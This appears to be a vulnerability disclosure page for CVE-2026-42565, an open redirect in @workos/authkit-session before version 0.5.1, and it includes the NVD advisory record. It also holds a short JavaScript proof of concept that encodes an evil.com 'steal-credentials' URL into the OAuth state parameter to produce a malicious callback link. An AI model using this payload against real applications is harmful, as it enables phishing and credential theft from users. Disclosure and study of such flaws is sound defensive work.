CVE-2026-42565

// Conceptual PoC for CVE-2026-42565 // Description: Demonstrates how an attacker can craft a malicious state parameter // to exploit the open redirect vulnerability in @workos/authkit-session. const crypto = require('crypto'); // 1. Attacker defines the malicious destination const maliciousRedirectUrl = "https://evil.com/steal-credentials"; // 2. Construct the payload for the state parameter // The application expects a JSON object containing 'returnPathname' const payload = { returnPathname: maliciousRedirectUrl }; // 3. Encode the payload (assuming Base64 encoding as per common OAuth patterns) const encodedState = Buffer.from(JSON.stringify(payload)).toString('base64'); // 4. Generate the exploit URL // This URL simulates the callback sent from the Identity Provider (IdP) const exploitUrl = `https://target-app.com/auth/callback?state=${encodedState}&code=auth_code_placeholder`; console.log("[+] Exploit Generated:"); console.log(exploitUrl); console.log("\n[+] Scenario:"); console.log("If the victim clicks this link (or is redirected here after IdP login),"); console.log("the vulnerable handleCallback function will decode the state,"); console.log("extract returnPathname, and redirect the user to:", maliciousRedirectUrl);

{"cve": {"id": "CVE-2026-42565", "sourceIdentifier": "[email protected]", "published": "2026-05-11T20:25:42.640", "lastModified": "2026-05-11T20:25:42.640", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "@workos/authkit-session is a toolkit for building WorkOS AuthKit framework integrations. Prior to 0.5.1, an open redirect vulnerability exists in AuthService.handleCallback due to insufficient validation of the returnPathname value derived from the OAuth state parameter. The state parameter is round-tripped through the identity provider (IdP) and can be influenced by an attacker. The handleCallback function decodes and returns returnPathname without enforcing restrictions on origin or scheme. As a result, attacker-controlled values may be returned to the application. If this value is used directly in a redirect, it may cause the user to be redirected to an external, attacker-controlled site. This vulnerability is fixed in 0.5.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://github.com/workos/authkit-session/commit/f56e1d6214a93160759e5677b7a3d772b244db39", "source": "[email protected]"}, {"url": "https://github.com/workos/authkit-session/releases/tag/v0.5.1", "source": "[email protected]"}, {"url": "https://github.com/workos/authkit-session/security/advisories/GHSA-vvvv-983w-r7pv", "source": "[email protected]"}]}}